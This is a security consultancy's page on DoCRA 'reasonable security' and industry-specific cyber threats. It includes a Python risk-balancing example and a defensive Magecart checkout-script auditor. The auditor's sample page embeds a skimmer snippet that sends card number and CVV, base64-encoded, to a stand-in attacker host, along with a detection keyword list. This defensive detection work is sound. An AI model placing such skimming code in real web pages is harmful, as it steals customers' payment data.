Risk is always a part of your cyber strategy. It evolves based on your environment. It could be calm one moment, then a disastrous storm the next. The key to managing risk is to continually take care of your critical business areas and all interested parties.
REGULATORY UPDATE: The SEC’s new rules on Cybersecurity Risk Management, Strategy, Governance, and Incident Disclosure require public companies to describe their cybersecurity programs in their periodic reporting and how they manage RISK.
But how do you manage the needs of many with different priorities?
By establishing reasonable security through the Duty of Care Risk Analysis (DoCRA). Duty of care requires that organizations demonstrate they used controls to ensure that risk was reasonable to the organization and appropriate to other interested parties at the time of the breach. This approach enables organizations to:
Prioritize security investments
Consider the needs of all interested parties
Demonstrate that the risk is ‘Acceptable’ or ‘Reasonable’
Protect the organization without overly burdening it
Continuously manage to ‘enough’ security
Manage your cyber insurance coverage appropriately
We also incorporate the Sedona Conference’s “Test for Reasonable Security Controls,” which establishes that safeguards must not pose a higher risk to the organization than the lack of safeguards poses to others. By balancing an organization’s mission, objectives, and obligations, your risk strategy will have the appropriate balance of compliance, security, and corporate responsibility. You will be practicing ‘reasonable security’.
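As an added illustration (not HALOCK’s, DoCRA’s or CIS RAM’s own scoring tables), the balancing test above can be written out as a check over candidate safeguards. The 1-to-5 scales, the acceptable-risk threshold of 9, the scenario and every score below are assumptions made for this example; a real DoCRA or CIS RAM assessment defines its own impact and likelihood criteria together with the interested parties.

```python
from dataclasses import dataclass

# Assumed ordinal scales for this example: impact 1 (negligible) to 5
# (catastrophic), likelihood 1 (rare) to 5 (expected). Acceptable risk is
# the score at or below which the organization has decided it need not act.
ACCEPTABLE_RISK = 9


@dataclass(frozen=True)
class Risk:
    impact: int      # worst foreseeable harm to any interested party, 1-5
    likelihood: int  # 1-5

    def score(self) -> int:
        assert 1 <= self.impact <= 5 and 1 <= self.likelihood <= 5
        return self.impact * self.likelihood


@dataclass(frozen=True)
class Safeguard:
    name: str
    residual: Risk  # risk to others that remains once the safeguard is in place
    burden: Risk    # risk the safeguard itself poses to the organization's mission


def evaluate(current: Risk, sg: Safeguard, acceptable: int = ACCEPTABLE_RISK) -> dict:
    """Apply the three tests to one candidate safeguard."""
    residual_acceptable = sg.residual.score() <= acceptable
    burden_acceptable = sg.burden.score() <= acceptable
    # Balancing test as the page states it: the safeguard must not pose a
    # higher risk to the organization than the unaddressed risk poses to others.
    balanced = sg.burden.score() <= current.score()
    return {
        "safeguard": sg.name,
        "current": current.score(),
        "residual": sg.residual.score(),
        "burden": sg.burden.score(),
        "residual_acceptable": residual_acceptable,
        "burden_acceptable": burden_acceptable,
        "balanced": balanced,
        "reasonable": residual_acceptable and burden_acceptable and balanced,
    }


def reasonable_options(current: Risk, candidates: list) -> list:
    """Names of safeguards that pass all three tests, least burdensome first."""
    results = [evaluate(current, sg) for sg in candidates]
    passing = [r for r in results if r["reasonable"]]
    return [r["safeguard"] for r in sorted(passing, key=lambda r: r["burden"])]


# Constructed scenario (assumption): an internet-facing server holding
# patient records is missing vendor patches. Scores are illustrative only.
CURRENT = Risk(impact=5, likelihood=4)  # 20, well above the acceptable level

CANDIDATES = [
    Safeguard("patch and segment", residual=Risk(2, 2), burden=Risk(2, 3)),
    Safeguard("air-gap the server", residual=Risk(1, 1), burden=Risk(5, 5)),
    Safeguard("annual awareness training", residual=Risk(5, 3), burden=Risk(1, 2)),
    Safeguard("patch, segment and MFA", residual=Risk(2, 1), burden=Risk(3, 3)),
]

if __name__ == "__main__":
    for sg in CANDIDATES:
        r = evaluate(CURRENT, sg)
        print(f"{r['safeguard']:28} residual={r['residual']:2} "
              f"burden={r['burden']:2} reasonable={r['reasonable']}")
    print("reasonable, least burden first:", reasonable_options(CURRENT, CANDIDATES))
```

A safeguard passes only if it brings the risk to others down to the acceptable level, its own burden stays within that level, and its burden never exceeds the risk it addresses. The air-gap option removes the risk entirely yet fails the last two tests, which is the over-burdening the page warns against, and the training-only option fails because it leaves the risk to others above the acceptable level.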
HALOCK, a privately owned and operated company based in Schaumburg, IL, helps organizations across all industries determine their acceptable level of risk to establish the reasonable and appropriate “duty of care” when it comes to cybersecurity. We serve clients of different sizes, including mid-sized to large Fortune 100 companies, in industries such as healthcare, financial services, nonprofits, startups, energy, retail, payment processors, manufacturing, IT, education/academic, communications, government, and supply chains. HALOCK partners with organizations to define their reasonable security controls based on a company’s mission, objectives, and social responsibility.
The Sedona Conference – an influential think tank that advises attorneys, regulators, and judges on challenging technical matters – released its Commentary on a Reasonable Security Test. The Commentary is the first document of its kind that provides the legal community with a clear definition of a “reasonable” security control.
HALOCK’s Chris Cronin was a co-author of Commentary on a Reasonable Security Test. To learn how to apply the test, contact us.
When clients face cybersecurity challenges they need the right combination of experts to advise them, as cybersecurity risks are not exclusively a legal, business, or technical challenge. Risks can be created on corporate boards, in the C-suite, within technical systems, or in the hands of end users. Moreover, impacts can occur during a breach, or after a regulator reviews a case. And because cybersecurity risk and compliance are multidisciplinary, advisors must capably address many specialized subjects at once to serve their clients well.
What is Reasonable Security for You or Your Client?
HALOCK Security Labs partners with attorneys and law firms to support clients in regulatory, strategic, and litigation matters using due care and reasonable person principles. HALOCK has pioneered an approach to risk analysis that aligns with regulatory standards for “reasonable” and “appropriate” safeguards and risk, and with the judicial “multifactor balancing tests” applied in data breach lawsuits. HALOCK has produced two emerging standards for cybersecurity risk management to promote this approach: the DoCRA Standard (Duty of Care Risk Analysis), maintained by the DoCRA Council, and CIS RAM (Risk Assessment Method), distributed by the Center for Internet Security.
By partnering with HALOCK, law firms expertly advise and represent their clients on legal, regulatory, and strategic matters while demonstrating that their clients’ complex technical decisions are defensibly reasonable. HALOCK is headquartered in Schaumburg, IL, in the Chicago area and advises clients on duty of care, regulatory compliance, and reasonable information security throughout the US.
There is an old proverb that generals and soldiers are always prepared to fight the last war. This has proved true on a number of occasions throughout history. Winston Churchill wrote in his memoirs, “It is a joke in Britain to say that the War Office is always preparing for the last war.” The last-war mentality can be traced back to the days of Napoleon, who consistently beat opponents who were still fighting the “last war.” The same can be said of cybersecurity.
Organizations are consistently fighting the “last threat,” unaware that the landscape of cyber threats and tactics has already moved on. It isn’t only that cyber threats change; it is the pace of that change that is so unsettling. During the first six months of 2017, industry leaders identified ransomware as the #1 cybersecurity threat. The WannaCry and NotPetya attacks over the summer of 2017 made headlines around the world as some of the largest global corporations were brought down for days and weeks. Yet within a year an entirely new threat, cryptomining, had displaced ransomware from the #1 spot. The tidal wave of ransomware appeared to recede as fast as it had arrived. The transition had several causes, among them the skyrocketing price of Bitcoin and other cryptocurrencies and the growing tendency of ransomware victims not to pay. These changing dynamics helped propel cryptomining attacks to increase by as much as 10,000 percent in some parts of the world in late 2017.
Those who focused singularly on ransomware were unprepared for cryptomining, and those who focus singularly on that more recent threat will miss the next one. Even now, the threat of cryptomining is diminishing, giving way to banking trojans and a resurgence of ransomware. While this constant “changing of the guard” plays out across all industries, what the next threat will be depends on the industry you are in. Below we look at some of the threat types facing each industry.
Different industries face different types of threats for a number of reasons, one being that each relies on technology or processes unique to it. An example is the network of automated teller machines that are ubiquitous today. In January 2018, the U.S. Secret Service began warning banks about a wave of attacks referred to as jackpotting, in which thieves install malicious hardware or software on an ATM to force it to dispense large volumes of cash on demand. U.S. banks had largely been spared this attack method, which has plagued other parts of the world, but it has now made its way to the States. In the end, of course, an ATM is nothing more than a computer, one that happens to be connected to a hoard of cash. As veteran cybersecurity professionals know all too well, it is hard enough to protect an ordinary workstation at a bank.
While every industry sector needs to prioritize its efforts to thwart cybersecurity threats, the financial sector must devote itself to this task more than most. The reason is simple: financial services firms fall victim to cyberattacks 300 times more frequently than businesses in other industries and incur greater cleanup and recovery costs. Some of these threats are obvious, such as the inherent exposure of online bank accounts. According to Kaspersky Lab, installations of banking malware apps reached a historic high in the second quarter of 2018 (61,000). Banking trojans are now the leading cybersecurity threat for financial institutions and their customers, accounting for nearly 59 percent of all malicious email payloads in the first quarter of 2018. Other, less obvious points of vulnerability include banks’ dependence on third-party service providers that supply digital services to augment their own platforms. According to a report by the U.S. Office of the Comptroller of the Currency, operational risk remains a principal risk area for banks because of the growing complexity of their enterprises, which demands a multi-layered security strategy.
While ransomware may not be the colossal cyber threat it once was, that is not the case when it comes to the healthcare industry. According to a poll commissioned last year that included 1,758 U.S. and Canada-based healthcare employees, 27 percent said they were aware of a ransomware attack against their employer within the past year. Even worse, of those who mentioned being aware of an attack, one third of them cited a repeated attack. In 2017, 45 percent of all ransomware attacks targeted the healthcare sector compared to only 12 percent for the financial services industry.
Ransomware attacks are not always deployed in order to garner extortion money. According to the U.S. Department of Health and Human Services, there were more than 100 cybersecurity incidents in 2019 that affected more than 500 individuals. Ransomware was a common thread in many of these attacks as cyber criminals now use ransomware as a way to cover their tracks after a breach.
Ransomware isn’t the only threat that the industry faces. The growing use of medical devices has increased the attack surface of healthcare organizations. According to the Food and Drug Administration, medical device vendors reported 400 percent more vulnerabilities per quarter last year. Medical devices are plagued with outdated operating systems, out-of-date firmware and even a dearth of authentication processes. All of this has induced the FDA to issue guidance for connected medical device security.
When one thinks of security threats peculiar to the retail industry, one usually thinks of skimming. Whether it is a clerk skimming a customer’s card for an added transaction or a strain of point-of-sale (POS) malware that lets attackers remote in and take over the terminals, skimming continues to be a common threat to retail establishments. But skimming isn’t just about POS machines. Thanks to malicious code campaigns such as Magecart, hundreds of thousands of credit card accounts have been exposed to hackers. Magecart is the collective name for loosely related criminal groups that inject card-skimming JavaScript into the checkout pages of online stores, so that card details are copied to an attacker-controlled server as the shopper types them in. This isn’t the only cyber threat that online retailers must worry about. According to the Verisign Q2 2018 DDoS Trends Report, DDoS attacks increased by 35 percent, with the average attack size up 111 percent year over year. Contrary to popular conception, DDoS attacks don’t just affect large retail conglomerates: an attack on a large online retailer equally affects the third-party retailers that depend on it, and an attack on a single payment services provider can devastate hundreds or even thousands of retailers at once.
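The Magecart pattern described above, as an added example that is not part of the original page or HALOCK’s own tooling: a script inventory a shop could run against its own checkout HTML to spot what an injected skimmer usually looks like, namely a script served from a host the shop never approved, an approved script shipped without a Subresource Integrity attribute, or inline code that reads card fields and encodes them for exfiltration. Everything here is constructed for the example: the allowed hosts, the keyword list and the sample page are assumptions, and a hit is a prompt to investigate, not proof of compromise.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed policy for this example: the only hosts permitted to serve
# JavaScript on the payment page.
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.shop.example", "js.psp.example"}

# Strings that inline skimmers typically contain: card-field names plus the
# encoding and eval helpers used to obfuscate the exfiltration (assumed list).
SUSPICIOUS_TOKENS = ("cardnumber", "cvv", "cvc", "expiry", "atob(", "btoa(", "eval(")


class ScriptCollector(HTMLParser):
    """Collect every <script> tag: its src, integrity attribute and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "integrity": a.get("integrity"), "body": ""}
            self.scripts.append(self._current)

    def handle_data(self, data):
        # html.parser delivers script content as raw data, possibly in chunks
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._current = None


def audit_scripts(html: str, allowed_hosts=ALLOWED_SCRIPT_HOSTS) -> list:
    """Return one finding per script that violates the page's script policy."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for s in parser.scripts:
        if s["src"]:
            host = (urlparse(s["src"]).hostname or "").lower()
            if host not in allowed_hosts:
                findings.append(f"external script from unapproved host: {s['src']}")
            elif not s["integrity"]:
                findings.append(f"external script without SRI integrity attribute: {s['src']}")
        else:
            body = s["body"].lower()
            hits = [t for t in SUSPICIOUS_TOKENS if t in body]
            if hits:
                findings.append("inline script references " + ", ".join(hits))
    return findings


# Constructed checkout page (assumption): one clean script, one approved
# script without SRI, one script from an unknown host, and an inline
# submit handler that copies the card fields into an image request.
SAMPLE_CHECKOUT = """
<html><head>
<script src="https://cdn.shop.example/checkout.js"
        integrity="sha384-EXAMPLEDIGEST" crossorigin="anonymous"></script>
<script src="https://js.psp.example/fields.js"></script>
<script src="//static-analytics.example/tag.js"></script>
</head><body>
<form id="payment"><input name="cardNumber"><input name="cvv"></form>
<script>
document.getElementById("payment").addEventListener("submit", function () {
  var d = document.querySelector("[name=cardNumber]").value + "|" +
          document.querySelector("[name=cvv]").value;
  new Image().src = "https://static-analytics.example/p.gif?d=" + btoa(d);
});
</script>
</body></html>
"""

if __name__ == "__main__":
    for finding in audit_scripts(SAMPLE_CHECKOUT):
        print(finding)
```

The same allowlist belongs in the page’s Content-Security-Policy script-src directive so that the browser enforces it rather than merely reporting; this script only inventories what is already on the page, which is the check to run after a deployment or when a payment processor reports a pattern of fraud traced to your store.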
According to the Cisco 2017 Annual Cybersecurity Report, nearly one in three retailers suffered revenue losses in 2016 as a result of a cyberattack. Sadly, just 52 percent of retail organizations consider their security infrastructure to be up-to-date and upgraded with the best technology tools. Retail more than any other business sector must defend itself against both the localized small time criminal as well as sophisticated international hacking organizations.
In some ways, manufacturing is one of the last industries to begin the digital transformation process. While manufacturers are enjoying the leaps in productivity and innovation that digitalization brings, they are also discovering the resulting exposure to cyberattacks. According to the National Center for Manufacturing Sciences, manufacturers have traditionally relied on physical isolation to secure assets, an approach that no longer works in an environment dominated by digital sensors and Internet of Things (IoT) devices. A recent survey by Deloitte found that only half of companies isolate their industrial control systems from their standard networks, opening themselves up to risk. A study commissioned by IBM showed that 87 percent of automotive manufacturers are quick to implement the Industrial Internet of Things (IIoT) but slow to secure it.
Today’s smart factory isn’t just about digital devices; it is about connected devices. The burgeoning ecosystem of connected IoT devices vastly increases the attack surface of today’s industrial complexes. While manufacturers may be new to the concepts and practices of cybersecurity hygiene, their adversaries are not. The thirst to acquire intellectual property in order to erode a competitor’s advantage is a driving force behind nation-state-backed attacks. As a result, a generic cybersecurity plan isn’t enough for the manufacturing sector. As a recent article in CSO Magazine asked, “Are you nation state ‘defense ready’?”
Not Just Controls, the Right Controls
Nearly every company and organization today knows it needs some type of security controls to defend against cyber threats. But merely having controls isn’t enough; it’s about having the right controls. You need the right tools, supported by the proper strategies, to combat the threats of tomorrow, not just those of the past. Just as important is understanding the threats that are specific to your industry and business: what is reasonable security in your world, and how do you implement reasonable threat management?
One way to accomplish this is to establish a HALOCK Industry Threat (HIT) Index. A HIT Index conducted by HALOCK provides insight, recommendations and direction on what you need to do to secure your particular enterprise against the risks you face today and tomorrow. HALOCK reviews your controls in the context of industry-specific threats and can also provide gap and risk assessments, penetration tests, incident response planning and compliance audits. The speed at which cybersecurity threats transform and evolve continues to accelerate. You don’t have time to keep up with the hastening pace of threat innovation, but HALOCK already does. HALOCK specializes in key industries and business sectors and has the understanding and knowledge base to secure your enterprise in a way that not only keeps your users and devices safe but serves as a competitive advantage as well. Analysis is key. Ask yourself, “Was the data breach foreseeable?”
HALOCK is a U.S.-based information security consultancy that is privately owned and operated out of its headquarters in Schaumburg, Illinois. From mid-sized to the Fortune 100, our clients span a variety of industries including financial services, health care, legal, manufacturing, supply chains, education, energy, SaaS/cloud, enterprise retail and many others. HALOCK strives to be your security partner, providing both strategic and technical security offerings. We combine strong thought leadership, diagnostic capabilities and deep technical expertise with a proven ability to get things done. HALOCK helps clients prioritize and optimize their security investments by applying just the right amount of security to protect critical business assets while satisfying compliance requirements and corporate goals. As principal authors of CIS Risk Assessment Method (RAM) and board members of The Duty of Care Risk Analysis (DoCRA) Council, HALOCK offers the unique insight to help organizations define their acceptable level of risk and establish “duty of care” for cybersecurity. Through this risk assessment method, businesses can evaluate cyber risk in terms that are clear to legal authorities, regulators, executives, lay people, and security practitioners. Services: Security Management, Risk Management and CIS RAM and DoCRA Risk Assessments, Mergers and Acquisitions (M&A) Risk & Cybersecurity Due Diligence, Compliance Validation (HIPAA, PCI DSS, Privacy, CMMC), Pen Testing (External Network, Internal Network, Wireless, Web Application, Social Engineering, Remediation Verification, Pen Testing Program), ISO 27001, Incident Response (Live Breach Response, Incident Response Plan, Incident Response Training, Technology Review, Run Books, SLA, Compromise Assessment), Security Engineering (Security Architecture Review, O365 Azure Security Architecture Review, Threat Hunting or MDR, HALOCK Industry Threat (HIT) Index, Security Products).
Get Access to HALOCK Cybersecurity and Risk Resources
Leverage our cybersecurity and risk resources – presentations, articles, infographics, checklists, case studies, educational posters and more. Visit this page often — we’re always adding new content and guidance on reasonable security!
HALOCK Security Labs helps companies develop a strategy to protect and defend their sensitive data, intellectual property and private information from malware, hackers and other cyber attacks. Based on Duty of Care Risk Analysis (DoCRA), our information security services are custom-built to meet the unique needs of every client, providing exactly the IT protection each of our clients requires, while helping them stay ahead of the threat landscape. HALOCK helps you develop reasonable safeguards and establish acceptable risk based on your company’s mission, social responsibility, and compliance requirements.
HALOCK Breach Bulletins
Read HALOCK overviews and analyses of recent data breaches to understand which threats and attacks are common and may impact your organization – featuring a description, indicators of compromise (IoC), containment, and prevention.